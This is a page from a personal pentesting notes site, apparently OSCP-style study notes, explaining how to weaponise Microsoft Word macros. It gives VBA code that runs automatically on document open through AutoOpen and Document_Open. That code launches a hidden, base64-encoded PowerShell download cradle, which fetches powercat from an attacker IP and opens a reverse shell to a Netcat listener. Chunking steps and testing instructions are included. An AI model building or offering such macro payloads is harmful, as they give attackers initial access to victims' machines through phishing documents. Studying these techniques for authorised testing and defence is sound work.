TamaGorengs Notes
  • πŸ‘¨β€πŸ’»Whoami
  • πŸ—ΊοΈActive Directory
    • Active Directory Enumeration
    • AD Reconnaissance
      • LDAP
    • Movement
      • Kerberos
        • ASREProast
        • Pass The Hash
        • Pass The Ticket
        • Overpass The Hash
      • Credential
        • Dumping
          • DCSync
      • WMI and WinRM
    • Active Directory Certificate Services (ADCS)
  • πŸͺŸWindows
    • Windows Privilege Escalation
      • WinPrivEsc Enumeration
      • Leveraging Windows Services
      • Abusing Other Windows Components
    • RDP
  • 🐧Linux
    • Linux Privilege Escalation
      • LinuxPrivEsc Enumeration
      • Exposed Confidential Information
      • Insecure File Permissions
      • Insecure System Components
  • πŸ•ΈοΈWeb Application
    • SQL Injection
    • Cross-Site Scripting (XSS)
  • Group 1
    • Client-Side Attacks
      • Windows Library Files
      • Exploiting Microsoft Office
  • Thick Client
    • Thick Client Pentest
    • Thick Client Pentest Methodology
Powered by GitBook
On this page
  • Leveraging Microsoft Word Macros for Reverse Shells
  • Overview
  • Key Points
  • Summary

Was this helpful?

  1. Group 1
  2. Client-Side Attacks

Exploiting Microsoft Office

Leveraging Microsoft Word Macros for Reverse Shells

Overview

Microsoft Word macros, written in Visual Basic for Applications (VBA), can automate tasks and serve as a powerful client-side attack vector when maliciously crafted. This guide outlines the creation of a macro to launch a reverse shell using PowerShell.

Key Points

1. Macro Basics

  • What are Macros?

    • Macros are written in VBA, offering full access to ActiveX objects and the Windows Script Host.

    • .doc or .docm formats are required to embed macros. Macros in .docx are not persistent.

2. Macro Setup

Steps:

  1. Save a Word document as .doc.

  2. Access the macro menu via View > Macros > Create.

  3. Develop the macro in the Visual Basic for Applications editor.

Default Macro Skeleton:

Sub MyMacro()
'
' MyMacro Macro
'
End Sub

3. Executing Commands with ActiveX

Example Macro to Open PowerShell:

Sub MyMacro()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub

4. Auto-Execution

Use AutoOpen and Document_Open to ensure macros execute when the document opens:

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

5. Creating a Reverse Shell

PowerShell Download Cradle:

IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>/powercat.ps1');powercat -c <IP> -p 4444 -e powershell

  • Base64-encode the command to avoid issues with special characters.

6. Embedding Encoded Commands

Split the base64-encoded string into chunks to bypass VBA's 255-character limit:

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND_PART1"
    Str = Str + "BASE64_ENCODED_COMMAND_PART2"
    ...
    CreateObject("Wscript.Shell").Run Str
End Sub

7. Testing

  1. Start a Python web server to host powercat.ps1.

  2. Use a Netcat listener to catch the reverse shell.

  3. Open the Word document and enable macros.

Summary

  • Objective: Exploit Word macros for initial footholds in enterprise networks.

  • Outcome: A reverse shell is achieved using a malicious macro that downloads and executes PowerCat via PowerShell.

  • Challenges:

    • Victim must enable macros.

    • Increased awareness and security controls make delivery harder.

Macros remain effective but increasingly challenging to deliver, necessitating alternative or supplementary attack vectors.

PreviousWindows Library FilesNextThick Client Pentest

Last updated 4 months ago

Was this helpful?